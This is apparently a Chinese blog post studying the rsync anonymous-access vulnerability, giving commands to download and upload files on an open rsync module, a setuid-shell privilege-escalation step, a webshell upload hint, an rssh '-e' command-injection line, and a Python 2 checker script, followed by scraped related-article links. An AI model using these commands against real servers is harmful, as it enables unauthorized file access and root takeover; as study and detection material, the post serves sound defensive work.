前言

前两天总结了互联网或者说IT公司内网常见的漏洞,然后决定针对还没学习过不了解的漏洞进行学习了解,所以准备一一针对来研习,今天是第一篇,立一个Flag,争取今年搞定,为啥说的这么艰难,因为平时工作忙,不一定每周都有时间研究,说一下,常见的WEB类漏洞,弱口令漏洞就不在赘述了,不算在此次学习之列

Rsync简介

什么是Rsync

Rsync(remote synchronize)是一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件。

什么是Rsync的匿名访问

匿名访问很简单,不需要用户名,不需要身份验证的所有信息(包括各种口令、公私钥、生物学特征等等),简而言之就是一句话,没有任何访问控制,直接可以访问



一般危害

下载:#rsync -avz a.b.c.d::path/file path/filiname

上传:#rsync -avz path/filename a.b.c.d::path/file

提权操作

#chmod a+s shell

#rsync -avz shell a.b.c.d::path/file

*查看shell权限不变,运行后提权到root,也可以尝试上传webshell*

rssh

此外rssh-2.3.3-3没有正确过滤-e选项,可能导致问题。

#rsync -e./script.sh  a.b.c.d::/tmp--server ./

漏洞验证

  • Metaspolit的auxiliary/scanner/rsync/modules_list
  • python脚本
# -*- coding:utf-8 -*-

"""

    Rsync匿名访问漏洞(未授权访问漏洞)验证工具

"""

#引入依赖的包和库文件

import os

import sys

import socket

import logging

#全局配置设置

logging.basicConfig(level=logging.INFO,format="%(message)s")

socket.setdefaulttimeout(3)

#全局变量

client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#全局函数:

def str2Binary(content):

    """将文本流转换成二进制流"""

    return content.replace(' ','').replace('\n','').decode('hex')

def rsyncCheck(ip,port):

    """执行端口预检查"""

    global client

    try:

        client.connect((ip,port))

    except Exception,reason:

        logging.error("[-] 访问失败:%s"%reason)

        return False

    helloString = "405253594e43443a2033312e300a"

    try:

        client.send(str2Binary(helloString))

        hellodata = client.recv(1024)

    except Exception,reason:

        logging.error("[-] 通信失败:%s"%reason)

        return False

    if hellodata.find("@RSYNCD") >= 0:

        try:

            client.send(str2Binary("0a"))

        except Exception,reason:

            logging.error("[-] 访问失败:%s"%reason)

            return False

        while True:

            try:

                data = client.recv(1024)

            except Exception,reason:

                logging.error("[-] 通信失败:%s"%reason)

            if data == "":

                break

            else:

                if str(data).find("@RSYNCD: EXIT") >= 0:

                    logging.info("[*] 发现漏洞!")

                    return True

    return False

if __name__ == "__main__":

    ip = sys.argv[1]

    try:

        port = sys.argv[2]

    except Exception,reason:

        port = 873

        logging.error("[-] 端口未输入,按照873默认端口进行")

    try:

        port = int(port)

    except Exception,reason:

        logging.error("[-] 端口输入错误,按照873默认端口进行")

        port = 873

    if not rsyncCheck(ip,port):

        logging.info("[+] 测试安全!")

Rsync匿名访问漏洞的更多相关文章

  1. rsync未授权访问漏洞利用

    漏洞描述:rsync是Linux系统下的数据镜像备份工具,使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他ssh,rsync主机同步.也就是说如果你可以连接目标IP的r ...

  2. 【Vulhub】Rsync未授权访问漏洞复现

    Rsync未授权访问 Rsync简介 rsync,remote synchronize顾名思意就知道它是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限.时间.软硬链接等附加信息 ...

  3. Rsync未授权访问漏洞的利用和防御

    首先Rsync未授权访问利用 该漏洞最大的隐患在于写权限的开启,一旦开启了写权限,用户就可以,用户就可以利用该权限写马或者写一句话,从而拿到shell. 我们具体来看配置文件的网相关选项(/etc/r ...

  4. rsync未授权访问漏洞复现

    rsync未授权访问漏洞简介 rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口.由于配置不当,导致任何人可未授权访问r ...

  5. ftp 匿名访问设置

    为了让ftp可以匿名访问,需要设置/etc/vsftp.conf 的 anonymous_enable=YES. 当然仅仅是这样,还是不可以的,会出现错误: vsftpd: refusing to r ...

  6. yarn 用户导致的被挖矿 启用Kerberos认证功能,禁止匿名访问修改8088端口

    用户为dr.who,问下内部使用人员,都没有任务在跑: 结论: 恭喜你,你中毒了,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程 ...

  7. ZooKeeper通过ACL修复未授权访问漏洞

    默认情况下ZooKeeper允许匿名访问,因此在安全漏洞扫描中暴漏未授权访问漏洞. 一.参考资料 <ZooKeeper 笔记(5) ACL(Access Control List)访问控制列表& ...

  8. mongodb未授权访问漏洞

    catalogue . mongodb安装 . 未授权访问漏洞 . 漏洞修复及加固 . 自动化检测点 1. mongodb安装 apt-get install mongodb 0x1: 创建数据库目录 ...

  9. 在JaveWeb项目中配置Spring 匿名访问时,匹配规则的变相实现/*

    实现/* /** * 根据当前的URL返回该url的角色集合. * 1.如果当前的URL在匿名访问的URL集合当中时,在当前的角色中添加匿名访问的角色(SysRole.ROLE_CONFIG_ANON ...

随机推荐

  1. [ES6]探究数据绑定之Proxy

    知识储备 Proxy 方式实现数据绑定中涉及到 Proxy.Reflect.Set.Map 和 WeakMap,这些都是 ES6 的新特性. Proxy Proxy 对象代理,在目标对象之前架设一层拦 ...

  2. PHP变量解析顺序variables_order

    转载自:http://blog.csdn.net/knight0450/article/details/4291556 故事从一个有点诡异的BUG开始,后台一个使用频率不是很高的广告提交功能有时候会莫 ...

  3. C++之程序时间统计类实现

    /********** TimeCounter.h huangsy13@gmail.com **********/ #ifndef TIMECOUNTER #define TIMECOUNTER #i ...

  4. e659. 缩放,剪取,移动,翻转图形

    AffineTransform tx = new AffineTransform(); tx.scale(scalex, scaley); tx.shear(shiftx, shifty); tx.t ...

  5. MySQL 插入数据时,中文乱码问题的解决

    当向 MySQL 数据库插入一条带有中文的数据形如 insert into employee values(null,'张三','female','1995-10-08','2015-11-12',' ...

  6. R语言低级绘图函数-abline

    abline 函数的作用是在一张图表上添加直线, 可以是一条斜线,通过x或y轴的交点和斜率来确定位置:也可以是一条水平或者垂直的线,只需要指定与x轴或y轴交点的位置就可以了 常见用法: 1)添加直线 ...

  7. C语言简单选择排序

    #include <stdio.h> int main(int argc, char const *argv[]) { // 将数组按照从小到大排序 , , , , , }; int i, ...

  8. Linux中利用LVM实现分区动态扩容

    使用命令: pvscan vgdisplay lvdisplay vgremove vgextend lvresize -l resize2fs 从物理磁盘,创建lvm逻辑分区 pvcreate vg ...

  9. haproxy+keepalived实现web集群高可用性[转]

    负载均衡集群的概念 负载均衡是设计分布式系统架构必须要考虑的因素之一,它指的是通过调度分发的方式尽可能将“请求”.“访问”的压力负载平均分摊到集群中的各个节点,避免有些节点负载太高导致访问延迟,而有些 ...

  10. spark 安装配置

    最佳参考链接 https://opensourceteam.gitbooks.io/bigdata/content/spark/install/spark-160-bin-hadoop26an_zhu ...